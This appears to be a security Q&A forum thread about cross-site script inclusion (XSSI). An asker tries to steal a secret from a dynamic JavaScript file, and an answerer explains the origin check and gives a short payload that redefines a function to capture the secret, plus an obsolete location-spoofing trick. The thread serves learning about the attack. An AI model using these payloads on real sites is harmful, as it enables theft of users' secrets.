I'm learning about XSSI attacks and I'm wondering if the following dynamic JS can be used to access the content.

Dinamic.js:

if (window.location.hostname === 'Demo.site.com' ){
    updateLoginHeader('Nick', 'IWANT-THIS-SECRET'); }

Can the attacker retrieve IWANT-THIS-SECRET using a JavaScript tag? I was trying something like:

<script type="text/javascript">
var secrets;

Array = function() {
  secrets = this;
};
</script>

<script src="https://example.com/Dinamic.js" 
  type="text/javascript"></script>

<script type="text/javascript">

  var yourData = '';
  var i = -1;
  while(secrets[++i]) {
    yourData += secrets[i] + ' ';
  }

  alert('I stole your data: ' + yourData);
</script>

Any ideas to retrieve IWANT-THIS-SECRET?

  • Is XSSI a simple misspelling of XSS, or do you mean something different? – AviD May 29 '17 at 07:57
  • I don't get where the secret is stored. Is it like constant argument of the updateLoginHeader call? – Fis May 29 '17 at 10:16

1 Answer

For a successful cross-site script inclusion attack you'd have to bypass this origin check:

if (window.location.hostname === 'Demo.site.com')

That isn't possible because modern browsers don't allow you to override window.location, as explained here and here. The hostname property is read-only for security reasons. This means that only Demo.site.com can access the IWANT-THIS-SECRET token by executing the JS file.

In older browsers, a redefinition of the property could have looked like this:

window.__defineGetter__("location", function(){
    return { hostname: "attacker.example" }
});

But if you attempt that, you'll get an error message. E.g., for Firefox:

TypeError: can't redefine non-configurable property "location"

If you were able to bypass the origin check, a simple XSSI attack could then work like this:

<script>
function updateLoginHeader() {
    alert(arguments[1]);
}
</script>
<script src="https://targetsite.example/Dinamic.js"></script>

As you can see, you just have to define your own function that captures the "secret" function argument. (Your attempt to redefine Array looks more like an approach to JSON hijacking which isn't helpful here and would also generally be unsuccessful in any modern browser.)

  • I was trying to use your scripting and using a valid location(For testing) but I can't get the content either. – pancho May 29 '17 at 16:53
  • @pancho Could you add the script you tested with to your question? – Arminius May 29 '17 at 16:54
  • I was trying ` ` Firefox sent "ReferenceError: updateLoginHeader is not defined" – pancho May 29 '17 at 17:07
  • @pancho Well, the script defines a global function `updateLoginHeader` so it's not plausible that Firefox treats it as undefined. This exact example (obviously with a valid link instead of `targetsite.example`) works fine for me. – Arminius May 29 '17 at 17:34